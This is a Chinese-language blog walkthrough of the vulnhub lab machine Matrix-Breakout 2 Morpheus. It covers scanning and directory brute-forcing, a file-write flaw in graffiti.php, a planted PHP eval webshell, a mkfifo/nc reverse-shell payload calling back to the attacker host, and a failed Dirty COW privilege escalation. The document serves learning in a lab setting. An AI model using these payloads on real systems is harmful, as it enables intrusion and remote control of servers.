首页 > 其他分享 >靶机Matrix-Breakout 2 Morpheus

靶机Matrix-Breakout 2 Morpheus

时间:2024-02-18 18:22:06浏览次数:24  
标签:0.104 shell Matrix 扫描 端口 192.168 Morpheus Breakout php

Matrix-Breakout 2 Morpheus笔记

拿到靶机先扔VMware

image-20240218152802681

信息收集

没其他东西了,于是先在nmap收集信息

nmap -sn 192.168.0.0/24

-sn  Ping扫描-禁用端口扫描

image-20240218153106674

发现靶机地址为192.168.0.104,继续收集信息,先给一套组合拳

nmap -T4 -sV -p- -A 192.168.0.104

-sV:此选项启用版本检测。Nmap 将尝试确定在开放端口上运行的服务的版本。
-p-:该选项告诉Nmap扫描所有端口。默认情况下,Nmap 仅扫描 1000 个最常见的端口。指定-p-可确保扫描所有 65535 个端口。
-A:此选项启用主动扫描。它包括操作系统检测、版本检测、脚本扫描和traceroute。

image-20240218154418679

发现开放了22、80、81端口,先直奔80网页看看有什么东西。

image-20240218154714946

网页目录爆破

感觉并没有什么能看到的东西,对着英文意思似乎让我们放弃ssh也就是22端口(?)那就去爆网页目录

dirsearch -u http://192.168.0.104/ -s 3
-s 后面跟每次请求后延迟多久,再次请求

image-20240218160801474

两个都是没什么用的

然后看到网上的wp直接用kali内置的字典能跑出来好东西

gobuster dir -u 192.168.0.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt

dir 指定目录爆破模式
-w  指定字典路径
-x  显示限定的格式

image-20240218161912028

发现有可疑文件graffiti(写的时候已经是尾声了,所以重新扫出来的结果里面会有一些多余的东西)

image-20240218162615773

文件上传/包含漏洞

访问graffiti.php后发现有一个留言板界面,使用brupsuite抓包分析

image-20240218163700143

发现可能存在文件包含漏洞,用伪协议将源码读出来

file=php://filter/read=convert.base64-encode/resource=graffiti.php

image-20240218163958828

<h1>
<center>
Nebuchadnezzar Graffiti Wall

</center>
</h1>
<p>
<?php

$file="graffiti.txt";
if($_SERVER['REQUEST_METHOD'] == 'POST') {//判断是否为POST请求
    if (isset($_POST['file'])) {//判断POST请求中是否有file变量
       $file=$_POST['file'];//将POST中file变量的内容赋值给$file
    }
    //将POST中的变量message写入到$file中
    if (isset($_POST['message'])) {
        $handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
        fwrite($handle, $_POST['message']);
	fwrite($handle, "\n");
        fclose($file); 
    }
}

// Display file
$handle = fopen($file,"r");
while (!feof($handle)) {
  echo fgets($handle);
  echo "<br>\n";
}
fclose($handle);
?>
<p>
Enter message: 
<p>
<form method="post">
<label>Message</label><div><input type="text" name="message"></div>
<input type="hidden" name="file" value="graffiti.txt">
<div><button type="submit">Post</button></div>
</form>
123

分析留言版源码可以发现,这里存在一个文件上传漏洞。因为$file可以抓包后修改,并且message的内容并没有任何过滤,这里可以上一个一句话木马

<?php eval($_POST['shell']);?>

image-20240218165344603

蚁剑成功拿到shell

image-20240218165545273

反弹shell

本来感觉蚁剑的shell挺好用的,但是看到别人的wp说会漏掉一些东西,还是要做一个反弹shell(实际感觉也只是wget方便点)。

用了好几个,只有这个能成功,URL编码一下

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.101 4444 >/tmp/f");?>

image-20240218170227514

开启nc端口监听,浏览器访问graffiti4.php

nc -lvvp 4444

成功推回shell到kali,用python脚本让推回来的shell好看一些

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20240218170710794

到处寻寻觅觅,到根目录下发现了个FLAG.txt

image-20240218171228654

大意是想让我寻找Cypher's password,还有看看/.cypher-neo.png里面的flag

前者先等一等,直接来看看让我们去浏览器访问的图片有什么。感觉明眼看不出来什么东西,那就可能隐写了什么在里面,杂项又不咋会,只能看看别人的wp怎么写了。看了一圈发现大伙都直接脚本跑提权漏洞,没FLAG.txt里面的内容什么事了。能力不足,跟着学习(抄抄)

image-20240218171720898

提权(不成功,未解决

kali本机开启web服务

python -m http.server

反弹shell中wget下脚本https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

wget 192.168.0.101:8000/linpeas.sh
chmod +x linpeas.sh

./linpeas.sh

发现可能存在脏牛漏洞

image-20240218173358405

image-20240218173625596

但是不清楚为什么提权不成功,重新看看其他人的做法,好像也大差无异(?)

image-20240218180355906

后续我用MSF也是在最后的提权失败了,弄挺久也不太知道哪里出问题了,先放弃了 T_T

标签:0.104,shell,Matrix,扫描,端口,192.168,Morpheus,Breakout,php
From: https://www.cnblogs.com/ethereal258/p/18019754

相关文章

  • Matrix-Tree 定理
    不会线性代数。行列式定义对一个\(n\timesn\)的矩阵\(A\),其\(n\)阶行列式写作\(\mathrm{det}(A)\)或\(|A|\),定义为\[\mathrm{det}(A)=|A|=\sum_{p}(-1)^{\tau(p)}\prod_{i=1}^{n}a_{i,p_i}\]所有的\(p\)形成\(1\)到\(n\)的全排列,\(\tau(p)\)表示排列\(p\)......
  • MatrixVT:高效View Transformation,让视觉BEV梦想照进现实
    原论文:MatrixVT:EfficientMulti-CameratoBEVTransformationfor3DPerception来自:CVPR2022,旷视科技,Submission-2022.11针对目前BEV中更有优势的Lift-Splat类方法中关键模块(VisionTransformation),MatrixVT实现了非常优雅的优化,在保持模型性能(甚至略微提高)的同时,能大幅降低计......
  • CodeForces 1609G A Stroll Around the Matrix
    洛谷传送门CF传送门我独立做出一道*3000?考虑对于单次询问,除了\(O(nm)\)的dp,有没有什么方法能快速算出答案。发现若\(a_{i+1}-a_i<b_{j+1}-b_j\)则\(i\getsi+1\),否则\(j\getsj+1\)是最优的。这个贪心的证明不难,考虑当前新走到某一行或某一列的贡献......
  • AT_arc115_b [ARC115B] Plus Matrix 题解
    AT_arc115_b[ARC115B]PlusMatrix题解题意给定矩阵\(C_{n\timesn}\),求两个数列\(A_n,B_n\),使得\(C_{i,j}=A_i+B_j\)。分析画出一个表格来:213243502131324可以看出来,对于任意一列\(j\),\(C_{*,j}\)都存在有\(B_j\)的贡献。那么我们......
  • SciTech-Math-AdvancedAlgebra-Linear Spaces(Vector Spaces) and Subspace: The Colu
    https://math.mit.edu/~gs/dela/dela_5-1.pdfhttps://people.math.harvard.edu/~knill/teaching/math22b2019/handouts/lecture01.pdfhttps://web.stanford.edu/group/dabmgroup/cgi-bin/dabm/wp-content/uploads/2021/12/Lecture_14.pdfN-elementorderedNumberSequence......
  • CodeForces 1500C Matrix Sorting
    洛谷传送门CF传送门做了好久。怎么会是呢。题目的操作可以看成,求出一些关键字,使得\(B\)矩阵的行是由\(A\)按照这些第\(1\)关键字、第\(2\)关键字一直到第\(k\)关键字,最后还有一个原来所在行下标的关键字,从小到大排序。肯定是从排好序的\(B\)矩阵入手。首先任意找......
  • vulnhub-matrix(cve-2022-0847提权)
    环境准备靶机matrix192.168.116.134攻击机kali192.168.116.130演示启动靶机,使用nmap探测网段nmap192.168.116.0/24 扫描192.168.116.134全端口nmap-p1-65535192.168.116.134 访问网站 扫描目录gobusterdir-uhttp://192.168.116.134/-xphp,bak,tx......
  • 模拟 - CF1196C Robot Breakout
    RobotBreakout(CF1196C)思路这道题因为平面极大,暴力枚举每个点肯定会超时。所以,我们不妨从机器人出发。我们可以枚举每个机器人可以执行的操作:位置从\((X_i,Y_i)\)变为\((X_i-1,Y_i)\),即向左走。位置从\((X_i,Y_i)\)变为\((X_i,Y_i+1)\),即向上走。位置从\((X_......
  • CF1016D Vasya And The Matrix Solution
    题目传送门做法因为是异或运算,可以按位考虑。先预处理出行(\(a[i]\))异或和\(suma\),与列(\(b[i]\))的异或和\(sumb\)。如果\(suma\nesumb\),那就说明无解,因为\(suma\)和\(sumb\)最后都代表着整个矩阵的异或和,如果两者不相等,那就说明矛盾,无解。否则就一定......
  • 使用cv2.getOptimalNewCameraMatrix函数,变为圆形是出现什么错误
    cv2.getOptimalNewCameraMatrix函数用于计算一个新的相机矩阵,以进行图像畸变校正。这个函数的目标是通过考虑畸变的影响,生成一个新的相机矩阵,使得校正后的图像更接近理想的情况。cv2.getOptimalNewCameraMatrix(cameraMatrix,distCoeffs,imageSize,alpha,newImgSize)其中......